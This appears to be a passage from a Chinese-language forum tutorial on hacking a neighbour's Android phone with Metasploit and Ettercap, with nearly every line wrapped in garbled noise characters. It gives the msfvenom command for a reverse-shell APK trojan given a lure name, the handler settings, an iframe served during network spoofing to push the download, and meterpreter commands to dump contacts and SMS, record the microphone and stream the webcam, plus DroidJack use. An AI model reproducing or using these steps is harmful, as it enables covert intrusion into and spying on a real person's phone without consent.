|
9 V1 W5 Z# s0 ?9 P! U% P+ p! E! D 五、msf+ettercap入侵邻居安卓手机
0 Z$ j9 Y- F+ K
- [7 v" C A7 i. m/ q# U, p
" n& |" i+ p3 p% w3 \; B/ E# p 首先启动msf
- Q) G3 @; c' ]; _6 g( E; q ; g# q* `3 p: J: W* S& Z0 \
" C4 P7 @" z2 F5 y' w- p. s 先用kali生成一个安卓木马,如下命令:
@' Q, w8 B5 d7 o7 n7 g8 _5 m: Q
" }0 i( x; G2 R; M2 q4 v# _6 {* d- L( ~4 v
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 8 G: z2 X |- p! A2 b6 i
. t0 d+ s- d6 p/ b( P6 @ I, Y
6 T. W: K( q& V* s& n% x m A y 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 / U4 h; V+ \2 c+ @
" `% w% A' I, r; {
9 m; V" n) s7 s0 h8 |! s# L, F 然后进入msf
' Q" y- v4 Q3 E+ a+ c0 L8 D
9 V2 l3 e9 n! B. R8 v
b7 P1 l; Z5 F6 d use exploit/multi/handler
) I3 T0 w& |; `% f# \; w: t8 q: B' q1 l' A
4 B5 [1 l+ e; }! }- f6 d, g( g
/ v% ?" Q: H2 `. p4 W4 o9 P set payload android/meterpreter/reverse_tcp
" z' C& |7 ^' T$ Q3 `9 ~+ z6 n # v4 u# l; h4 E
, B9 l6 ^9 R; l" ` set LHOST 192.168.0.109 //ip为kaili的ip 5 H* j8 p; r" u
^" R2 X9 I3 { }/ e- t
7 a' R& k5 Q! {: k set LPORT 44444 //端口一定要与前面生成的木马的端口一致
" L* K6 L6 X1 K
, a x) e5 {+ q4 `0 ], B
- t; ^! ~2 N1 ^, J Exploit * D* C6 D. a0 h6 K) I( A
6 l9 F1 Z- k5 Y7 Y( k
, R$ e) R. I5 F& {$ o: q ' z; `. A! p5 D p
$ g; y* p- {4 o+ U& |! x. a. w2 b8 j+ T+ Y% n. n+ [' f
下面我们开启ettercap -G
( I1 j! W f9 |5 W7 w
C2 E! h8 Z. ?& W" M. {$ o) n$ Y
8 G1 m3 }1 u y/ W! y, [ 我物理IP为
1 _% v$ }) O: R# s/ ?0 F & U% f$ M1 D6 B1 t4 U
4 c. a8 d: {- C2 R1 e) Q9 j$ H6 V; E 5 J, S U+ s1 d" L4 a
: O7 H: ~, ^$ Y) G: g; w# S. F+ O1 ?8 [1 e' X
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
4 T9 _: n2 h1 s1 k3 \
. R6 g9 Q1 J. U. R( s* n" r
) V$ ^- `8 c9 _- _! c. a# v2 ^: o 下面我们来设置一下
) d( o/ C2 M0 s! v/ Y$ b/ U& {
5 ?4 O4 l2 |* F0 t$ t* S: n* [3 P
, K6 ~4 u: i# \5 ] } , e9 |) _# A2 r9 S6 D
9 X8 A2 i7 x1 V) I7 w- ?3 K4 X
7 b6 P' s, c9 y
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
: d) z0 Y- E; o : T# }- q! X: f; r+ T. D
+ J2 M, E8 d1 q- a, `% Y5 ~3 K6 m1 l . a1 j. J- D: D; f
4 J" i0 p3 G/ S, a+ O4 D" m! {5 C- ?$ [# }
0 s! \) O2 p G( b& D+ b! d! b
' X" q5 _4 f% \' q3 y0 Z2 c# R2 ]
7 P- @) R$ b9 J- L# p, e) Q * W7 p' |* q+ A3 B( N2 i- Y; p
: b& x3 h. q: y6 ?3 s
6 Q9 T% V. \$ l" S3 r
6 e/ |0 A. {/ t$ V2 P. k) @1 P
2 o3 Z5 B! d: S* T( A$ ~7 W2 A2 o# k. O9 ]2 B2 P4 d
5 i2 \; j, V* h; P5 S4 g" t3 j
2 z# B% Y! D, e P% d
6 M5 N, [8 ]' e' B0 x
6 o) q8 D; w( G. [/ E- ~3 ~
& m X$ Z8 ^% I j/ W3 E2 y/ l* Z) W5 w- g- s& x
7 P- E1 V9 s. ~/ G+ d* b
5 o( \% q3 f- y$ _# w- ?
1 l3 V- ^. I( V8 p( H& Q
1 _2 h. Y" j) [- e9 J % g7 V; P: o" A5 {
p* Z, ^& u U/ y% L
- o9 d: E, Z- e& x4 a% [7 T , a, w" f% J# }
, V9 O8 ?; o. d' m6 y' T. i( i* m
9 U. q7 a) ~# r1 m6 Y
5 H. M0 `' e( F/ ~+ C3 o2 d0 Q2 x
# `* r8 v2 n0 Z$ h) |. |8 }1 N
. t/ S/ J/ v: v7 }' c
( I% {' P0 `3 h5 ^/ I) K1 n
4 Z% m4 M5 Q3 `9 u7 j4 `$ t
; p, e7 {' _6 [" b
: z# J9 a' }) y' D
7 \ m$ T1 J/ ]7 \$ D4 w " ~; I$ X7 K7 M! W6 P$ r# t7 t* R& K
7 C/ O8 `( |4 G
下面我们开始攻击 ' ^+ W" U5 L( G" l2 n
' Z6 q/ y) d) \- U
; H" k! v5 I6 a5 Y
* A/ J1 n* c. f/ Z
' N+ K7 O' P6 b/ p
/ x ?+ @4 ]& A" c! O# b4 J; G
: W- E/ u5 R) f; B- R
- x2 t, {# o7 e+ v. {3 U5 y2 @) D3 q$ h4 e0 ~4 M/ n+ V# M4 R
0 Q; Q5 _- S: ?; b1 P6 D% O
& i" _9 h" H) b+ P1 l' i. H
, a# {( }6 e, b# {5 X
8 Y& [' q& V* _
; ?( S3 P n* j4 e0 ^. N3 f
, T% L' }# ^+ m 5 r) V4 j, [3 N4 k3 S
: g6 e% b4 A6 Y0 C
+ n" I4 ]. G" N 大概过了5分钟多,发现反弹成功了
, ~ |0 x2 d- M# r! \: U 6 a+ P9 }/ _) B3 t ~% S+ K
+ J2 ?& Z2 r/ E; s2 g8 j0 J+ ^
( ]# {, L2 x+ Z- Y5 X
6 G/ i7 S" }: @) H: a0 B
1 N1 [6 T) m6 G, D o5 z 3 S8 J2 E1 G t9 F8 x0 |$ t3 @
% k \/ _! w& g7 w! |$ I
; f: _7 d! H {) g2 D# S
1 B: y R2 N( l& h# m ! N# ]# T) Z) S1 V
1 n4 I4 {) W8 G9 S" ~1 m! [
: E6 d% u- }; z# x4 r( a h" ~
( c$ E+ [* |# z3 ?% r
4 f( g5 K7 L5 F8 o$ m4 ~
8 d6 K" O' a% \8 K1 |
4 j. v* Z6 Q9 u3 l& W4 y/ Z
" l8 b5 O0 K( O/ A
) e, O: f7 d# |
_( ` `" a4 } U2 ?* ? @
0 V6 M3 k) U2 A" s' `# | ; U/ D0 D+ {9 I) @
2 h- r; k8 X# B! x
+ C. X( o" H8 } 执行命令 5 w# B5 |5 T6 i8 ?1 `" Z
/ M* I0 }/ }9 ]
1 A. e) m4 I" u" a 4 \. A H+ k5 }, h
, ~7 k2 F/ R4 K6 D/ J
7 D4 H) p; U' T6 w dump_contacts --》这个是导出电话 # R0 r* N+ p+ l7 j* y
' a% A; e7 M5 k( Z# j+ _7 ^
& n6 [% V" `6 T
dump_sms --》这个是导出信息 4 H$ u* d; D* J6 Y% D! X
3 |. B, b$ i+ F/ ]% N
5 k7 Y& D; s& U1 _9 y2 O, }4 R record_mic Record audio from the default microphone for X seconds " z: \+ N4 `8 a
# G" _7 h+ n' x4 p2 {( f
7 J' s; t- q: c6 U webcam_chat Start a video chat
4 j% U5 z9 b3 d6 W- H# G R
: h4 ~! _) `9 a8 ~0 Q7 e
/ j9 o4 d ?% N2 \ webcam_list List webcams % {! |# B' V m- c
8 P& s% k% G# Y/ n
/ J9 z2 w. p% A webcam_snap Take a snapshot from the specified webcam
& T% v; w) E( K& @9 b2 R: K. L8 {
- y4 W, I$ Q0 r/ R6 ]( p5 q- b9 O% e# q1 J. y" n/ X
webcam_stream   lay a video stream from the specified webcam
% ~; C' }. a4 E9 m: w o! Z. C
! j+ Y9 {. a- V
) F, B. P2 E# O( C( E: j ! q3 e, _8 o. p; x; o; H* K
# N* ]) F+ C/ D) b8 @9 `+ K7 g; I. a
" C6 ~4 h4 x& ~4 f, D, {& ~
9 y1 m( E* }7 _; {3 V, J7 N' p: A6 U" @0 E2 p* m) E7 I5 S L$ v
我们打开看一下电话薄,
2 O1 B1 u6 O, Q) D b
3 U( e$ _) z: j6 Z, l# C4 _6 V# r1 Q9 H
1 L/ l9 z/ B5 k* `/ D/ m 8 C4 K X s5 b6 S) @, R
. {- T; A; Q) u' V5 P, _6 f7 @
% }0 v. Y! a8 s( C' J% g7 h - H( e' |9 E3 D( ~0 Z6 Y# S
2 B& u3 M3 y8 I1 }% c2 k/ H
& _7 d3 n/ N1 o3 g, g- `; e" p3 G
9 a$ d+ i7 h; ^
8 S6 T8 w0 u! E + M$ _7 X; F9 x- C
$ s/ \7 C5 C7 @* y% B
$ O. m& S7 n9 u: _
+ x2 q4 e4 {* B3 k
8 F+ V- ~9 f8 e1 r) `4 i5 e+ [. F; g; z+ B2 [9 v
3 f* m- |4 n1 m2 [+ } Y. J 9 s: I9 s8 E4 W! Y& i- Z- ~9 n
- ]9 ]7 z! @% o$ Z
我们同时欺骗成DroidJack木马,使用方法如图:
$ |' J7 a& L+ c0 W3 Q
6 l7 M; H* ?2 b' i% g" q0 v) E6 _' ~# x1 h( F
, W& t: Y @* [8 U 4 ?2 x. K9 b) h3 q$ q) E
J o9 u2 h7 S0 Y' }4 [
$ V. F2 |; z8 |8 l! h. m& A2 h& G
7 y6 z+ Y( A [% S8 F/ ~1 e. i9 m! u) R9 {* ?* U
; B8 f% [0 q, ~' V0 K( h ! a- S0 r5 y6 c7 @: X }- t
% ?+ |/ T% j6 W$ |0 h
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
- ~8 Y; j7 E2 {& B
8 H6 V, P( a+ G8 r( `
# W- Q! K' S; P/ V- _7 a4 H% `$ s 2 N h/ S) t4 f5 z$ }
" \. Y! l) g* O: R+ h' [6 w5 j
) o- V# w3 R/ p7 y
) `7 ^3 E/ Y1 v' U$ Y1 t7 I/ s
6 b/ ?: w P; i$ G: x- H7 C* R: K5 `1 V9 K' c' m n9 o
( O3 `. t0 _% N8 A
+ o( j' ?# L3 t) z+ W$ S! u7 ?) g" I5 Z8 k# _( [

% b* h6 g) h T$ z# [) u: I " U: P% x( J3 X6 Q7 w0 h
8 ?3 n( X# ^$ o % Y: b! b$ D; \4 l9 P) _9 I6 P
|